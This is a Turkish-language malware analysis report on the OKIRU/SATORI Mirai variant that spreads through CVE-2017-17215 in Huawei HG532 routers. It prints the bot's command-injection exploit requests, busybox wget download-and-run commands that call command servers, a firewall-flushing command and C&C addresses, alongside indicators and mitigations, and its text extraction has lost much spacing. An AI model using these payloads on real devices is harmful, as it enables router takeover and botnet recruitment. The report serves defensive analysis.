OKIRU/SATORI BOTU İNCELEMESİ - Siber Güvenlik Teknolojileri...siber güvenlik alanında faaliyet göstermektedir. Özellikle kamu kurumları, finans kuruluşları ve kritik altyapılara

OKIRU/SATORI BOTU İNCELEMESİ

BilgeSGT BilgeSOMEBilgeSGT,teknolojientegrasyonuve

sibergüvenlikalanındafaaliyet

göstermektedir.

Özelliklekamukurumları,finans

kuruluşlarıvekritikaltyapılara

yönelikhizmetlervermekteolanBilge

SGT,kurumlarınözelihtiyaçları

doğrultusundauçtanucateknoloji

çözümlerisunmaktadır.

Ağteknolojileri,sunucuvesistem

çözümleri,güvenliveridepolama

sistemleri,iletişimşifreleme,ağ

trafiğioptimizasyonuçözümleri

sunabilenBilgeSGT,mevcut

çözümleriözelleştirerekkurumların

verimliliğiniveyönetimkabiliyetlerini

arttırmayıhedeflemektedir.

BilgeSOME,kurumlarınsiber

güvenlikolaylarıanındaihtiyaç

duyduklarıgüveniliruzmandesteğini

sağlamakiçinBilgeSGTtarafından

kurulmuşsibergüvenlikekibidir.

Sistemleriniz,iletişimaltyapınız,

uygulamalarınızsaldırıaltında

olduğunda,bilgilerinizinsızdırılıp

ifşaaedilmeriskiilekarşılaştığınızda;

BilgeSOMEacilmüdahaleekibiyle

sizedestekolmakvekurumunuzu

sibersaldırılarakarşıhazırlamak

altyapınızıiyileştirir,teknik

ekiplerinizieğitir.

Bilge SGT Sayfa 3 / 12

RAPOR HAKKINDA 30 Kasım 2017 tarihinde Huawei HG532 model yönlendirici modem cihazlarında

keşfedilen güvenlik zafiyeti, teknik detayları paylaşılmamasına rağmen saldırı amaçlı

kullanılmaya başlanmıştır. Raporda incelenen OKIRU/SATORI Bot’u, 2016 yılı

sonunda yayılmaya başlayan ve dünya genelinde birçok cihazı etkileyerek çok kuvvetli

DDoS saldırılarına sebep olan Mirai Bot’u temel alınarak geliştirilmiştir. Mirai botunda değişiklik yapılarak, Huawei cihazlardaki bu güvenlik açığını kullanıp zararlı yazılımın

yayılmasını sağlayacak hale getirilmiş, yayılırken kullandığı dosya adı olan “okiru”’dan yola çıkılarak ismi OKIRU/SATORI olarak tanımlanmıştır.

Zararlı yazılımın kısa süre içerisinde Amerika Birleşik Devletleri, Orta ve Güney

Amerika ülkeler, Kuzey Afrika ülkeleri, Japonya, Orta Avrupa ve Türkiye’de etkili olduğu gözlemlenmiştir.

OKIRU/SATORI’nin atası olan Mirai Bot ağı kullanılarak çeşitli web sitelerine saldırılar

gerçekleştirilmişti. İnternetin en büyük DNS hizmet sağlayıcılarından birisi olan DYN şirketine gerçekleştirilen saldırı Twitter, Spotify, Reddit, Paypal, Netflix gibi küresel

bilinirliği olan hizmet ve içerik sağlayıcıların servislerini 2016 yılı sonu ve 2017 yılı başlarında kesintiye uğratmıştı.

Analiz çalışmamızda OKIRU/SATORI Botunun binary dosyası üzerinden hızlı inceleme

yaparak nasıl çalıştığı, nasıl yayıldığı ve ne tedbir alınması gerektiğini anlamaya yönelik teknik bir değerlendirme sunulmaktadır.


OKIRU/SATORI BOT NEDİR, NASIL YAYILIR

OKIRU/SATORI solucanu, internete bağlı cihazları ve modemleri hedef alan Mirai

Botunun varyantıdır. Zarrlı yazılım, baz aldığı Mirai’nin kullandığı basit kullanıcı

adı/parola ikilileri yerine Huawei HG532 model yönlendirici modem aygıtlarında yakın

zamanda tespit edilmiş olan CVE-2017-17215 kimlik numaralı güvenlik zafiyetini

kullanarak enfekte olmakta ve yayılmaktadır.

Zararlı yazılım yayılmak için Huawei HG532 model yönlendirici modem aygıtların TR-064 protokolü implementasyonundaki yazılım hatasını kullanmaktadır. TCP/37215 ve

TCP/52869 portunda hizmet veren UPnP (Universal Plag and Play) servisinin girdi doğrulamaları eksik veya hatalı yapması sonucu, komut (Shell) satırında çalıştırılabilen

özel karakterler olan “ $( ) “ karakterleri isteklere enjekte edilebilmekte ve böylelikle

cihazların komut satırında yönetici yetkileri ile komut çalıştırılabilmektedir. Komut

satırında yapılacak işlemler, gerçekleştirilen istek içerisindeki NewStatusURL ve

NewDownloadURL direktiflerinin içerisine enjekte edilmektedir. Bu sayede saldırgan

sadece Mirati/Satori botunun URL’ini hedef sisteme vererek botun cihaz tarafından

indirilerek çalıştırılmasını sağlayabilmektedir.

Enjekte ederek komut satırında busybox içerisinde çalıştırdığı komut şu şekildedir;

busyboxwget-g172.93.97.219-l/tmp/rsh-r/okiru.mips;chmod+x

/tmp/rsh;/tmp/rsh


TEKNİK DETAYLAR Zararlı yazılımın farklı platformlara yayılmak için kullandığı binary dosyaların adları ve hash değerleri;

HashDeğeri

BinaryAdı

df9c48e8bc7e7371b4744a2ef8b83ddf b

a7922bce9bb0cf58f305d17ccbc78d98 okiru.mipsel

37b7c9831334de97c762dff7a1ba7b3f okiru.arm7

e1411cc1726afe6fb8d09099c5fb2fa6 okiru.x86

cd4de0ae80a6f11bca8bec7b590e5832 okiru.x86

7de55e697cd7e136dbb82b0713a01710 okiru.mips

797458f9cee3d50e8f651eabc6ba6031 okiru.m68k

353d36ad621e350f6fce7a48e598662b okiru.arm

8db073743319c8fca5d4596a7a8f9931 okiru.sparc

0a8efeb4cb15c5b599e0d4fb9faba37d okiru.powerpc

08d48000a47af6f173eba6bb16265670 okiru.x86_64

e9038f7f9c957a4e1c6fc8489994add4 okiru.superh

Zararlı yazılımın komuta kontrolü için kullanılan sunucuların IP adresli listesi

C&CIPAdresleri

95.211.123.69(GüncelSunucu)

77.73.69.177

172.93.97.219

165.227.220.202

198.7.59.177


Zararlı yazılımın binary dosyası incelendiğinde enfekte olduktan sonra cihaz

üzerindeki güvenlik duvarı kurallarını kaldırmaktadır;

iptables-F

Yine incelemede enfekte olduğu sisteme uygun binary dosyanın wget ile indirildiğini

ve indirme yerindeki tam dizini tespit etmek mümkündür;

/bin/busyboxwgethttp://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s-O->%s;/bin/busyboxchmod777%s;./%s;>%s

OKIRU/SATORI’nin diğer aygıtlara yayılmak için cihazlara gönderdiği HTTP isteklerinin detayları şu şekildedir;

POST/picdesc.xmlHTTP/1.1

Host:%s:52869

Content-Length:603

Accept-Encoding:gzip,deflate

SOAPAction:urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping

Accept:*/*

User-Agent:Hello-World

Connection:keep-alive


<?xmlversion="1.0"?><s:Envelope

xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"

s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMa

ppingxmlns:u="urn:schemas-upnp-

org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalP

ort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>443

82</NewInternalPort><NewInternalClient>`cd/var/;cp$SHELL

c;>c`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription

>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><

/u:AddPortMapping></s:Body></s:Envelope>


Host:%s:52869

Content-Length:630



Accept:*/*









82</NewInternalPort><NewInternalClient>`cd/var/;wgethttp://%d.%d.%d.%d/rt.mips-

O->c`

</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>sync

thing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:Ad

dPortMapping></s:Body></s:Envelope>



Host:%s:52869

Content-Length:602



Accept:*/*









82</NewInternalPort><NewInternalClient>`cd/var;chmod+x

c;./c`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription

>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><

/u:AddPortMapping></s:Body></s:Envelope>

POST/ctrlt/DeviceUpgrade_1HTTP/1.1

Host:%s:37215


Content-Length:430


Accept:*/*



Authorization:Digestusername="dslf-config",realm="HuaweiHomeGateway",

nonce="88645cefb1f9ede0e336e3569d75ee30",uri="/ctrlt/DeviceUpgrade_1",

response="3612f843a42db38f48f59d2a3597e19c",algorithm="MD5",qop="auth",

nc=00000001,cnonce="248d1a2560100669"

<?xmlversion="1.0"?>

<s:Envelopexmlns:s="http://schemas.xmlsoap.org/soap/envelope/"

s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

<s:Body><u:Upgradexmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">

<NewStatusURL>$(/bin/busyboxwget-g%d.%d.%d.%d-l/tmp/.f-r/b;sh

/tmp/.f)</NewStatusURL>

<NewDownloadURL>$(echoHUAWEIUPNP)</NewDownloadURL>

</u:Upgrade>

</s:Body>

</s:Envelope>

İndikatör olarak kullanılabilecek veriler şu şekildedir;

• İsteklerin hedef portu TCP/52869 veya TCP/37215

• İstekler HTTP protokolü üzerinden ve SSL kullanılmadan SOAP istekleridir

• Isteklerin hedef dosyası /picdesc.xml veya /ctrlt/DeviceUpgrade_1

• İsteklerin User-Agent değeri “Hello-World”

• İstek gövdesinde (request body) busybox wget veya chmod veya $SHELL

dizileri bulunması

Enfekte olan cihazlar komuta kontrol sunucusuna TCP/7645 portuna bağlanmaya

çalışmaktadır. Dinamik analiz sistemlerini ve kum havuzlarını yanıltmak amacıyla

ortam kontrollerini yaptıktan sonra “109.206.187.130:23” adresine bağlantı isteği

gönderiyor gibi davranmaktadır.


SALDIRGAN HAKKINDA BİLGİ Saldırı gelmişmiş bir güvenlik zafiyeti tekniği kullanıyor olsa da, saldırganın internet

üzerindeki güvenlik forumlarında “Mirai Botu’nu nasıl modifiye edebileceğini” soran

“Nexus Zeta” takma ismini kullanan amatör bir korsan olduğu tespit edilmiştir.

Resim1–HackForums’daARMv6bDerleyiciSorusu

Resim2-"nexus_zeta"TwitterHesabı

Resim3-"NexusZeta"GitHubHesabı


NASIL TEDBİR ALIRIM?

• Ağınıza doğru trafiklerde TCP/52869 ve TCP/37215 portlarına yönelik istekleri

engelleyin.

• Ağınızdan dışarıya doğru komuta kontrol sunucusu listesinde verilen IP

adreslerine doğru trafikleri engelleyin.

• Huawei HG532 model yönlendirici modem kullanıyorsanız üreticinizin

yamalarını ve güncel firmware sürümünü modeminize yükleyin.

• Huawei HG532 model yönlendirici modem kullanıyorsanız cihaz üzerindeki

güvenlik duvarından dışarıdan gelen TCP/52869 ve TCP/37215 portlarına

yönelik istekleri engelleyin.

• Uzaktan yönetim arabirimlerini WAN ara yüzlerinden erişime mutlaka kapatın.


Kurumsal Siber Olaylara Müdahale Ekipleri (SOME) eğitimi ve siber güvenlik

operasyon merkezi çalışmalarımız hakkında bilgi almak için bizlerle irtibata

geçebilirsiniz.

+90 (312) 240 32 36

[email protected]

Documents

OKIRU/SATORI BOTU İNCELEMESİ - Siber Güvenlik Teknolojileri...siber güvenlik alanında faaliyet göstermektedir. Özellikle kamu kurumları, finans kuruluşları ve kritik altyapılara